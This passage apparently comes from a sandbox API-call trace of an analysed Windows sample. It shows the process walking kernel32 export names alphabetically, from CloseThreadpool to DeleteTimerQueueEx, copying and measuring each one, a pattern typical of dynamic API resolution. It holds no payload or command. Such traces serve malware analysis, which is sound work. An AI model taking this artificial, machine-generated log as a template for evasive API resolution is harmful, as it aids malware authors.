(lpString="CLOSETHREADPOOL") returned 15 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.546] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.546] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.546] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.546] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.546] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.546] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.546] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.546] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.546] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.546] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.546] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.546] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.546] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.546] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.547] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.547] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.547] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.547] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.547] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.547] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.547] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.547] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.547] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.547] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.547] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.547] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.547] lstrlenA (lpString="COPYFILEA") returned 9 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.547] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.547] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.547] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.547] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.547] lstrlenA (lpString="COPYFILEW") returned 9 [0178.547] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.548] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.548] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.548] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.548] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.548] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.548] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.548] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.548] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.548] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.548] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.548] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.548] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.548] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.548] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.548] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.548] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.548] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.548] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.548] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.549] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.549] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.549] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.549] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.549] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.549] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.549] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.549] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.549] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.549] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.549] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.549] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.549] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.549] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.549] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.549] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.549] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.549] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.549] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.549] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.550] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.550] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.550] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.550] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.550] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.550] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.550] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.550] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.550] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.550] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.550] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.550] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.550] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.550] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.550] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.550] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.550] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0178.551] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.551] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.551] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.551] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.551] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.551] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.551] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.551] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0178.551] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.551] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.551] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.551] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.551] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.551] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.551] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.551] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.552] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.552] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.552] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0178.552] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0178.552] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0178.552] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0178.552] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0178.552] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0178.552] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0178.552] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0178.552] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0178.552] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0178.552] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0178.552] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0178.552] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0178.552] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0178.552] lstrlenA (lpString="CTRLROUTINE") returned 11 [0178.552] lstrcpyA (in: lpString1=0x239db34, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0178.552] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0178.553] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0178.553] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0178.553] lstrlenA (lpString="DEBUGBREAK") returned 10 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0178.553] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0178.553] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0178.553] lstrlenA (lpString="DECODEPOINTER") returned 13 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0178.553] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0178.553] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0178.553] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0178.553] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0178.553] lstrlenA (lpString="DELETEATOM") returned 10 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0178.553] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0178.553] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0178.553] lstrlenA (lpString="DELETEFIBER") returned 11 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0178.553] lstrlenA (lpString="DELETEFILEA") returned 11 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0178.553] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0178.553] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0178.553] lstrlenA (lpString="DELETEFILEW") returned 11 [0178.553] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0178.554] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0178.554] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0178.554] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0178.554] lstrcpyA (in: lpString1=0x239db34, 